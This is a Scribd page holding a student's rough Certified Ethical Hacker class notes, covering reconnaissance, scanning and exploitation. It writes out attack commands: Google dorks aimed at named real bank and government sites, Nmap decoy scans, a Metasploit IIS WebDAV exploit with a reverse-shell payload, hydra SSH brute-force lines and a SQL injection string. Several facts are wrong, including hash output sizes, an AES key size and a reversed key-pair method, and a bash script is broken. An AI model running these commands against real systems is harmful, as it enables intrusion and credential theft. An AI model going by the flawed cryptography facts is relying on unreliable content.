Scribd
Upload
30 views6 pages

Ceh

The document outlines various concepts and tools related to ethical hacking, including commands in Linux, network scanning techniques using Nmap, and methods for gaining access through vulnerabilities. It discusses cryptography, hashing algorithms, and digital signatures, as well as tools for password cracking and SQL injection. Additionally, it covers session hijacking, buffer overflow, and the importance of security elements like confidentiality, integrity, and authenticity.

Uploaded by

Ami Stranger
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
30 views6 pages

Ceh

The document outlines various concepts and tools related to ethical hacking, including commands in Linux, network scanning techniques using Nmap, and methods for gaining access through vulnerabilities. It discusses cryptography, hashing algorithms, and digital signatures, as well as tools for password cracking and SQL injection. Additionally, it covers session hijacking, buffer overflow, and the importance of security elements like confidentiality, integrity, and authenticity.

Uploaded by

Ami Stranger
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 6

CEH:

Class 1: Yes command in Linux: yes> /root/Desktop/test.txt….


?? Where ls command locate. Why ls doesn’t shows in process list.

Exploit is an agent. Original content called payload.

Threat is an event by how your system can hamper.


Vulnerability is the weakness of that machine.

Security Element: Confidentiality, Integrity, and Availability


Integrity: If any changes happened in system the changes should be detectable.

Authenticity, Non-Repudiation
Authenticity: Both systems must know who want to log in and where he wants to
log in.
Non-Repudiation: No one can deny that he did it.

GPL: GNU public License …what we are using free license.

Phase-1:
Reconciles: Footprinting

3D traceroute
path analyzer

cd /pentest/enumeration/dns/dnsenum# .dnsenum.pl robi.com.bd


./forcepl

google hack database


operator:
site::thecitybank.com
site::thecitybank.com –nrbms.thecitybank.com ------Output can get from
cd /pentest/enumeration/google/gohost ./goohost.sh –t thecitybank.com –m –
ip –p 20 -v
dnsrecorn in backtrack

in google: thecitybank.com filetype:pdf

thecitybank.com filetype:pdf “ facebook secret”


.gov.bd inurl:login.php
inurl:adminlogin.php

GHDB ---Gony Hacking Database

Network Scanning:
3-way handshake
Wireshark: Rteset ack if the port is closed .

Half open connection. Stealth scan.

Nmap –sS –p 80 dst ip ---s =send S =Syn packet (ip.dst==192.168.135.131 for


filter in wireshark)

Namp –sO dstip (s for scan O for operating system)

CEH class-2:

Nmap –T(1,2,3,4,5) x.x.x.x (1=per 5 mins,2=per 1 mins,3=.5 mins,4=.75


mins,5=200 0acket per sec)

Nmap –sV –SS

Nmap scripting engine located in /usr/local/share/nmap/scripts/


Nmap –Ss –-script scriptname.nse

Enumerate SMB with nmap script:

Nslookup
>set type=PTR
>x.x.x.x

#!/bin/bash
echo “please enter the network range”
read range
for ip in ‘1 to 254
do
host $range.$ip

Gaining access:
Vulnerability:
VS
1. Specific
2. Detail (Tools : Nexpose, Nessus, GFI Lan Guard)
www.nessus.org
Exploiting (Metasploit, Core Impact)

Exploit
Payload
RHOST
RPORT
LHOST
/pentest/exploits/framework2#./msfconsole
/pentest/exploits/framework2/exploit/

msf> use iis50_webdav_ntdl (press enter)


set RHOST remote ip
set RPORT 80
set LHOST local ip
set payload win32_reverse
exploit

Ophcrack to use receive password from hash value.

Add an extra value in password hash

=rand (20,10)
www.eicar.org for dummy virus.
Steganography is a tools to hide something (Merge Stream,Glue)

C:\ shahadat.txt:Test.txt hide


ADS –Alternate Data System
To protect this mechanism use a drive in Fat32 system

SET:
/pentest/exploits/set ./set
url shortener

===================
Class 3:
ICMP packet contains 48 bite arbitrary value.
By fuzzer system you can do application level flood attack.
Burp Suite is a proxy server.

LOIC, Ddoshttp for http flooding

Session Hijacking:
cd /proc/PID/sessionID folder contains all session ID for that process.
How to see the session ID whether it is encrypted or not???????????

Scapy Packet crafting tool


Droidsheep, Firesheep

Need to know analyze the session ID.


How to check open relay is enabled or not in mail server.

Configure Tripware and Honeypot


wireshark &
Show packet fragmentation on wireshark

nmap -py -f dst ip


namp -f -p 80 --mtu=16 "dst ip"

nmap -D -p 80 192.168.198.130,ME 192.168.198.132


132 is the target ip.

nmap -p 80 --packet-trace --ip-options "L 192.168.198.1" www.google.com


Called Source routing.

=====================================================

Cryptography :

Method-1: Sender can encrypt the document with his private key and receiver
can decrypt the document with his public key.

Method-2: Sender can encrypt the document with receivers public key and
receivers can decrypt it with receivers private key.

Final Method: First encrypt the doc with sender private key then sender will get
a cipher text then encrypt cipher text with receivers public key.

Hash Function:

AES and DES is symmetric key encryption and Rejendal and DEA is the
algorithm.
AES is implementation of Rejendal algorithm.

AES Block size is 128 with key size 128,164,192


DES Block size is 64 with key size 64 effectively 56
MD5, SHA-1, SHA-2, SHA-3 is the hashing algorithm

All object has a different hash value.


Hash output is always same size.
MD5 Output size 64
SHA-1 output size 128
SHA-2 output size 256
SHA-3 output size 512

Encryption (DES,AES,RC)
Hashing MD%,SHA
Above two makes Digital Signature
Digital Signature confirm below four things:
Confidentiality
Integrity
Senders Auth
Non repudiation

Temper Data is a proxy tools.\

Buffer Overflow:

Buffer allocation in memory:

Arg (initial value for


any function)
Stack (Executable
Function)

Heep
Values
Variables
Code

Stack Table:
Arg (initial value for
any function)
Value
Variable
Return Addrss (After
execute the defined
function)
Code like printf

After execute a program you get back the following error:


Segmentation fault

When variable value get extra then microprocessor send the extra value to
EIP(Instruction Pointer)

debugger tool use to see Microprocessor usage

==========================================================
index.of
medusa, hydra is a password cracking tool
hydra -l root -P "passwordfile.txt" "ip address" ssh
hydra -L userlist.txt -P "passwordfile.txt" "ip address" ssh
acunetix, foca

SQL INjection:
In user name and password field use a single coat if you got a database error
then it support sql injection
Sqlmap and sqlinject me is a tools to use sql injection.

" or 1=1--"

winrtgen is the Rainbow table generator.

Medusa is another password cracking tools.

You might also like